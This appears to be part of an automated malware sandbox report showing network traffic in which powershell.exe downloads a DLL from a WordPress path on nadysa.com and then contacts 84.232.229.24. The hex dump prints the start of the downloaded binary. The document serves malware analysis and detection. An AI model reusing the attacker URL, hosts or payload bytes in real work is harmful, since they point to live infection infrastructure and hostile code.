Jan 25, 2021 11:20:44.867084026 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.867109060 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.867125988 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.867139101 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.867156982 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.867175102 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.867201090 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.867207050 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.867276907 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.867861986 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.867904902 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.867943048 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.867948055 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.867971897 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.867991924 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.868016005 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.868035078 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.868072033 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.868108988 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.868803024 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.868844986 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.868869066 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.868906021 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.868906021 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.869921923 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.869962931 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.869987965 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.870016098 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.870026112 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.870040894 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.870075941 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.870091915 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.870107889 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.870145082 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.870171070 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.870202065 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.870208025 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.870244980 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.870317936 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.870845079 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.870884895 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.870923042 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.870948076 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.870973110 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.870987892 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.871009111 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.871047020 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.871079922 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.871093988 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.871110916 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.871124983 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.871161938 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.871198893 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.871227026 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.871269941 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.871865988 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.871907949 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.871944904 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.871890068 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.871993065 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.872035027 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.872036934 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.872065067 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.872103930 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.872142076 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.872149944 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.872165918 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.872205019 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.872212887 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.872921944 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.872971058 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.873013020 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.873038054 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.873049021 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.873070002 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.873078108 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.873117924 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.873141050 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.873156071 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.873181105 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.873182058 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.873265982 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.873989105 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.874037981 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.874073982 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.874111891 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.874150038 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.874166012 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.874175072 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.874201059 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.874214888 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.874238014 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.874284029 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.874319077 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.874366045 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.875478029 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:45.013060093 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:45.013119936 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:45.013159037 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:45.013185978 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:45.013221979 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:45.013247013 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:45.013262987 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:45.013284922 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:45.013293982 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:45.013298035 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:45.013302088 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:45.013334036 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:45.013340950 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:45.013365030 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:45.013421059 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:45.013458967 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:45.013925076 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:45.013964891 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:45.014003038 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:45.014039993 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:45.014039993 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:45.014069080 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:45.014089108 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:45.014098883 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:45.014132977 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:45.014152050 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:45.014158964 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:45.014180899 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:45.014198065 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:45.014236927 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:45.014261007 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:45.014261007 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:45.014292002 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:45.014300108 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:45.014327049 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:45.014362097 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:45.014364958 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:45.014404058 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:45.014451981 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:45.014512062 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:45.014554024 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:45.014828920 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:45.015799999 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:45.015841961 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:45.015880108 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:45.015906096 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:45.015928030 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:45.015943050 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:45.015990973 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:45.016005039 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:45.016021967 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:45.016057968 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:45.016094923 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:45.016119003 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:45.016136885 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:45.016155005 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:45.016192913 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:45.016221046 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:45.016855955 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:45.016894102 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:45.016933918 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:45.016942978 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:45.016959906 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:45.016997099 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:45.017023087 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:45.017057896 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:45.017059088 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:45.017097950 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:45.017133951 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:45.017158031 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:45.017168045 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:45.017194986 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:45.017210960 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:45.017273903 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:45.017807961 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:45.018934011 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:45.018959045 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:45.018996954 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:45.019033909 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:45.019071102 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:45.019081116 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:45.019109964 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:45.019123077 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:45.019136906 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:45.019186020 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:45.019227982 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:45.019253016 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:45.019259930 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:45.019293070 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:45.019320011 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:45.019346952 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:45.019356012 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:45.019383907 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:45.019422054 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:45.019469976 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:45.019473076 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:45.019512892 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:45.019550085 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:45.019566059 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:45.019853115 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:45.019881964 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:45.019915104 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:45.019917965 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:45.019958019 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:45.019973040 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:45.020013094 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:45.158035994 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:45.158097982 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:45.158106089 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:45.158135891 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:45.158145905 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:45.158179998 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:45.158185005 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:45.158227921 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:45.158227921 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:45.158267021 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:45.158282042 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:45.158315897 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:45.160981894 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:45.161050081 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:45.161899090 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:45.161942959 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:45.161958933 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:45.161983967 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:45.338258028 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:21:50.494024038 CET	49166	80	192.168.2.22	84.232.229.24
Jan 25, 2021 11:21:50.543827057 CET	80	49166	84.232.229.24	192.168.2.22
Jan 25, 2021 11:21:50.544188023 CET	49166	80	192.168.2.22	84.232.229.24
Jan 25, 2021 11:21:50.546128035 CET	49166	80	192.168.2.22	84.232.229.24
Jan 25, 2021 11:21:50.546320915 CET	49166	80	192.168.2.22	84.232.229.24
Jan 25, 2021 11:21:50.594376087 CET	80	49166	84.232.229.24	192.168.2.22
Jan 25, 2021 11:21:50.594491959 CET	49166	80	192.168.2.22	84.232.229.24
Jan 25, 2021 11:21:50.642932892 CET	80	49166	84.232.229.24	192.168.2.22
Jan 25, 2021 11:21:50.643062115 CET	49166	80	192.168.2.22	84.232.229.24
Jan 25, 2021 11:21:50.890407085 CET	80	49166	84.232.229.24	192.168.2.22
Jan 25, 2021 11:21:50.998769999 CET	80	49166	84.232.229.24	192.168.2.22
Jan 25, 2021 11:21:50.999133110 CET	49166	80	192.168.2.22	84.232.229.24
Jan 25, 2021 11:21:51.004179001 CET	80	49166	84.232.229.24	192.168.2.22
Jan 25, 2021 11:21:51.004472971 CET	49166	80	192.168.2.22	84.232.229.24
Jan 25, 2021 11:21:51.048567057 CET	80	49166	84.232.229.24	192.168.2.22
Jan 25, 2021 11:21:51.048897982 CET	49166	80	192.168.2.22	84.232.229.24
Jan 25, 2021 11:21:51.051424026 CET	80	49166	84.232.229.24	192.168.2.22
Jan 25, 2021 11:21:51.051928043 CET	49166	80	192.168.2.22	84.232.229.24

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 25, 2021 11:20:43.660578966 CET	52197	53	192.168.2.22	8.8.8.8
Jan 25, 2021 11:20:43.692176104 CET	53	52197	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jan 25, 2021 11:20:43.660578966 CET	192.168.2.22	8.8.8.8	0xfc39	Standard query (0)	nadysa.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Jan 25, 2021 11:20:43.692176104 CET	8.8.8.8	192.168.2.22	0xfc39	No error (0)	nadysa.com		217.144.106.11	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

nadysa.com

84.232.229.24

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49165	217.144.106.11	80	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data
Jan 25, 2021 11:20:43.855108976 CET	0	OUT	GET /wp-content/Almet/ HTTP/1.1 Host: nadysa.com Connection: Keep-Alive
Jan 25, 2021 11:20:44.006011009 CET	1	IN	HTTP/1.1 200 OK set-cookie: 600e9b7be6c9d=1611570043; expires=Mon, 25-Jan-2021 10:21:43 GMT; Max-Age=60; path=/ cache-control: no-cache, must-revalidate pragma: no-cache last-modified: Mon, 25 Jan 2021 10:20:43 GMT expires: Mon, 25 Jan 2021 10:20:43 GMT content-type: application/octet-stream content-disposition: attachment; filename="FVuZwepQsUwldyAWc.dll" content-transfer-encoding: binary transfer-encoding: chunked date: Mon, 25 Jan 2021 10:20:43 GMT server: LiteSpeed connection: Keep-Alive Data Raw: 32 30 30 30 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 89 46 0b 60 00 00 00 00 00 00 00 00 e0 00 0e 21 0b 01 02 32 00 40 00 00 00 12 05 00 00 00 00 00 50 19 00 00 00 10 00 00 00 50 00 00 00 00 00 10 00 10 00 00 00 02 00 00 03 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 d0 05 00 00 04 00 00 a7 c7 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e8 60 00 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 54 05 00 58 15 00 00 00 c0 05 00 e0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac 61 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 9e 36 00 00 00 10 00 00 00 38 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 57 00 00 00 00 50 00 00 00 02 00 00 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 90 04 00 00 00 60 00 00 00 04 00 00 00 3e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 65 78 74 34 00 00 9c 05 05 00 00 70 00 00 00 06 05 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 65 78 74 38 00 00 64 00 00 00 00 80 05 00 00 02 00 00 00 48 05 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 40 2e 74 65 78 74 37 00 00 64 00 00 00 00 90 05 00 00 02 00 00 00 4a 05 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 40 2e 74 65 78 74 36 00 00 64 00 00 00 00 a0 05 00 00 02 00 00 00 4c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 40 2e 74 65 78 74 35 00 00 64 00 00 00 00 b0 05 00 00 02 00 00 00 4e 05 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 40 2e 72 65 6c 6f 63 00 00 e0 03 00 00 00 c0 05 00 00 04 00 00 00 50 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 2000MZ@!L!This program cannot be run in DOS mode.$PELF`!2@PP`dTXa`.text68 `.rdataWP<@@.data`>@.text4pB@.text8dH @.text7dJ @.text6dL @.text5dN @.relocP@B
Jan 25, 2021 11:20:44.006046057 CET	3	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: U]Ujac
Jan 25, 2021 11:20:44.006067038 CET	4	IN	Data Raw: c3 cc 55 8b ec 83 ec 0c a1 00 62 00 10 89 45 f4 c7 45 f8 b0 60 00 10 8b 4d f8 c6 01 9c 8b 55 f8 0f b6 02 83 e8 33 8b 4d f8 88 01 8b 55 f8 c6 42 01 a1 8b 45 f8 0f b6 48 01 83 e9 33 8b 55 f8 88 4a 01 8b 45 f8 c6 40 02 a7 8b 4d f8 0f b6 51 02 83 ea Data Ascii: UbEE`MU3MUBEH3UJE@MQ3EPMAUB3MAUBEH3UJE@MQ3EPMAUB3MAUBEH3UJE@MQ3EPMAUB
Jan 25, 2021 11:20:44.006088018 CET	6	IN	Data Raw: 00 00 c7 45 fc 41 02 00 00 c7 45 fc 41 02 00 00 c7 45 fc 41 02 00 00 c7 45 fc 41 02 00 00 c7 45 fc 41 02 00 00 c7 45 fc 41 02 00 00 c7 45 fc 41 02 00 00 c7 45 fc 41 02 00 00 c7 45 fc 41 02 00 00 c7 45 fc 41 02 00 00 c7 45 fc 41 02 00 00 c7 45 fc Data Ascii: EAEAEAEAEAEAEAEAEAEAEAEAEAEAEAEAEAEAEAMc-chx`h(db(dJu*dhu,dDu3!ccc=c
Jan 25, 2021 11:20:44.006113052 CET	7	IN	Data Raw: c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 Data Ascii: EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE*
Jan 25, 2021 11:20:44.006150961 CET	8	IN	Data Raw: 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 Data Ascii: EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE*
Jan 25, 2021 11:20:44.006170988 CET	10	IN	Data Raw: f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 Data Ascii: EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE*
